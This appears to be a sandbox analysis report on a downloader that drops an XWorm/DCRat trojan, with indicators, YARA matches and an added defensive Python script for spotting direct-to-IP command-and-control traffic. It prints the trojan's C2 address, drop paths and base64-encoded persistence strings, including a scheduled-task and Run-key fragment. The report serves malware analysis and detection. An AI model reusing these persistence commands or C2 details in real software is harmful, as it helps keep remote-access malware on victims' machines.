Source: unknown | HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.6:49712 version: TLS 1.2
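
Editor's note on the network section above. The submitted sample is a native downloader (seftali.pdb, WinINet chain InternetOpenW/InternetOpenUrlW/InternetReadFile at 0_2_00007FF6517916C0) that resolves github.com and raw.githubusercontent.com, fetches XWormUI.exe over TLS with the User-Agent "ProgramDownloader", and writes it to the IE cache and to %Temp%\RuntimeBroker.exe. The dropped .NET RAT then connects straight to 37.18.62.18:8060, the Server/Ports pair from its extracted config; because the address is hard-coded there is no lookup, which is what the repeated "TCP traffic detected without corresponding DNS query" line and the non-standard-port signature record. The script below, added here and not Joe Sandbox code, applies those two checks to constructed flow and DNS records modelled on this section. The DNS answer addresses are an assumption (the report prints the queried names and the TLS peers, not the DNS responses), and the "standard port" set is a placeholder to tune per environment.

```python
"""
Two checks the report applies to 37.18.62.18:8060: a TCP connection to an
address no DNS answer ever named, and a non-standard destination port.
Added example over constructed records; not Joe Sandbox code.
"""
from typing import Dict, List, NamedTuple, Set, Tuple


class Flow(NamedTuple):
    src: str
    sport: int
    dst: str
    dport: int


# Constructed from the report's network section. The DNS answers are assumed
# to be the addresses the TLS sessions went to; the report does not show them.
DNS_ANSWERS: Dict[str, Set[str]] = {
    "github.com": {"140.82.121.3"},
    "raw.githubusercontent.com": {"185.199.111.133"},
}
FLOWS: List[Flow] = [
    Flow("192.168.2.6", 49710, "140.82.121.3", 443),
    Flow("192.168.2.6", 49712, "185.199.111.133", 443),
    Flow("192.168.2.6", 49713, "37.18.62.18", 8060),
]
# Placeholder set of ports treated as ordinary outbound client traffic.
STANDARD_PORTS = {80, 443, 53, 22, 25, 587, 993, 995, 123}


def answered_ips(dns_answers: Dict[str, Set[str]]) -> Set[str]:
    """Every address that appeared in a DNS answer in the observation window."""
    return {ip for ips in dns_answers.values() for ip in ips}


def flag_flows(flows: List[Flow], dns_answers: Dict[str, Set[str]],
               standard_ports: Set[int] = STANDARD_PORTS) -> List[Tuple[Flow, List[str]]]:
    """Return each suspicious flow with the reasons it looks like direct-to-IP C2."""
    known = answered_ips(dns_answers)
    findings = []
    for f in flows:
        reasons = []
        if f.dst not in known:
            reasons.append("destination never appeared in a DNS answer")
        if f.dport not in standard_ports:
            reasons.append(f"non-standard destination port {f.dport}")
        if reasons:
            findings.append((f, reasons))
    return findings


if __name__ == "__main__":
    for flow, reasons in flag_flows(FLOWS, DNS_ANSWERS):
        print(f"{flow.src}:{flow.sport} -> {flow.dst}:{flow.dport}: " + "; ".join(reasons))
```

Only the 37.18.62.18:8060 flow is flagged, on both counts. The DNS-less check is only meaningful when the DNS log and the flow log come from the same host and time window: cached answers, DNS-over-HTTPS and CDN addresses resolved before the window all look "DNS-less" and will produce false positives, so use it as a ranking signal next to the IP and JA3 reputation hits the report already lists, not as a standalone verdict.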

            Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: 3.0.RuntimeBroker.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000000.2173837580.0000000000612000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 3420, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe, type: DROPPED

            System Summary

            Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 3.0.RuntimeBroker.exe.610000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 3.0.RuntimeBroker.exe.610000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
            Source: 3.0.RuntimeBroker.exe.610000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
            Source: 3.0.RuntimeBroker.exe.610000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
            Source: 00000003.00000000.2173837580.0000000000612000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 00000003.00000002.4612955259.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 00000003.00000002.4613580739.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: Process Memory Space: RuntimeBroker.exe PID: 3420, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, type: DROPPEDMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe, type: DROPPEDMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, type: DROPPEDMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, type: DROPPEDMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, type: DROPPEDMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe, type: DROPPEDMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe, type: DROPPEDMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe, type: DROPPEDMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 3_2_00007FFD347767523_2_00007FFD34776752
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 3_2_00007FFD347706003_2_00007FFD34770600
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 3_2_00007FFD347759A63_2_00007FFD347759A6
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 3_2_00007FFD347705303_2_00007FFD34770530
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 3_2_00007FFD347706703_2_00007FFD34770670
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 3_2_00007FFD347704983_2_00007FFD34770498
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 3_2_00007FFD347704B83_2_00007FFD347704B8
            Source: XWormUI[1].exe.0.drStatic PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
            Source: RuntimeBroker.exe.0.drStatic PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
            Source: sslproxydump.pcap, type: PCAP | Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 3.0.RuntimeBroker.exe.610000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 3.0.RuntimeBroker.exe.610000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
            Source: 3.0.RuntimeBroker.exe.610000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
            Source: 3.0.RuntimeBroker.exe.610000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
            Source: 00000003.00000000.2173837580.0000000000612000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY | Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 00000003.00000002.4612955259.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 00000003.00000002.4613580739.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: Process Memory Space: RuntimeBroker.exe PID: 3420, type: MEMORYSTR | Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, type: DROPPED | Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe, type: DROPPED | Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
            Source: XWormUI[1].exe.0.dr, Settings.cs | Base64 encoded string: 'GTHkLv0n511+WFpCgaIiGdRg/5G+3ytjrl/pqaY5CC2/uoO7K63FU/HqTRgvagOQtqISVXBmopa+YikE2q7k2A==', 'yG/yJG+weDZb+1BCsj7T1vOtGTzoLGcZlgUuzY4i6eB2zN++gblv+Sy1KaSOyI7zHOsPVSIziLhkSApTKNusEA==', 'G0wvQTaFpIOVvlizDxu9mxRqVtbfwSna3TYgcRtfsT/wgr3H7864L2MvfNYh0oIH/vYtRZlULU2m4MMSltPtCBtUcR6ZxbGlt5/uM0zXsqI=', '…', 'QXWIq7Mq82DWl6IaGIGfv2fY6AnJIfBY9clhTArmEU9DMOgGA+JKXNu6IA1Ei73TEkB+qqmqf6z0Hy+bQpynrA==', 'v0V9G8XWB54VLncZAj0EwVTmn3o387ZdN9snMSgdxzWq/6fqy4DZKsD+A3EybZcbE5SuucIbWm5pnMTiIP4fjQ==', 'K3Nl4TwW4zjsVAO8Zugh18IykcltSuVVF/0YHj0BH7k523w6+kWpoiUYcXSnZt39jVrxVPNWlpmG14OnPnDrPg=='
            Source: XWormUI[1].exe.0.dr, NormalStartup.cs | Base64 encoded string: 'L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g', 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
            Source: RuntimeBroker.exe.0.dr, Settings.cs | Base64 encoded string: 'GTHkLv0n511+WFpCgaIiGdRg/5G+3ytjrl/pqaY5CC2/uoO7K63FU/HqTRgvagOQtqISVXBmopa+YikE2q7k2A==', 'yG/yJG+weDZb+1BCsj7T1vOtGTzoLGcZlgUuzY4i6eB2zN++gblv+Sy1KaSOyI7zHOsPVSIziLhkSApTKNusEA==', 'G0wvQTaFpIOVvlizDxu9mxRqVtbfwSna3TYgcRtfsT/wgr3H7864L2MvfNYh0oIH/vYtRZlULU2m4MMSltPtCBtUcR6ZxbGlt5/uM0zXsqI=', '…', 'QXWIq7Mq82DWl6IaGIGfv2fY6AnJIfBY9clhTArmEU9DMOgGA+JKXNu6IA1Ei73TEkB+qqmqf6z0Hy+bQpynrA==', 'v0V9G8XWB54VLncZAj0EwVTmn3o387ZdN9snMSgdxzWq/6fqy4DZKsD+A3EybZcbE5SuucIbWm5pnMTiIP4fjQ==', 'K3Nl4TwW4zjsVAO8Zugh18IykcltSuVVF/0YHj0BH7k523w6+kWpoiUYcXSnZt39jVrxVPNWlpmG14OnPnDrPg=='
            Source: RuntimeBroker.exe.0.dr, NormalStartup.cs | Base64 encoded string: 'L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g', 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
            Source: XWormUI[1].exe.0.dr, Methods.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: XWormUI[1].exe.0.dr, Methods.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: RuntimeBroker.exe.0.dr, Methods.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: RuntimeBroker.exe.0.dr, Methods.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engine | Classification label: mal100.troj.evad.winEXE@3/2@2/3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Mutant created: NULL
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Mutant created: \Sessions\1\BaseNamedObjects\RuntimeBroker.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | File created: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | ReversingLabs: Detection: 44%
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Virustotal: Detection: 58%
            Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Process created: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Section loaded: msvcp140.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Section loaded: vcruntime140_1.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Section loaded: vcruntime140.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Section loaded: ncryptsslp.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Section loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Section loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Section loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Section loaded: wbemcomn.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Section loaded: amsi.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Section loaded: userenv.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Section loaded: secur32.dll
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Static PE information: Image base 0x140000000 > 0x60000000
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\Users\erays\source\repos\seftali\x64\Release\seftali.pdb%% source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe
            Source: Binary string: C:\Users\erays\source\repos\seftali\x64\Release\seftali.pdb source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Code function: 3_2_00007FFD347700BD pushad ; iretd 3_2_00007FFD347700C1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | File created: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe

            Boot Survival

            Source: Yara match | File source: 3.0.RuntimeBroker.exe.610000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000003.00000000.2173837580.0000000000612000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 3420, type: MEMORYSTR
            Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, type: DROPPED
            Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe, type: DROPPED
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match | File source: 3.0.RuntimeBroker.exe.610000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000003.00000000.2173837580.0000000000612000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 3420, type: MEMORYSTR
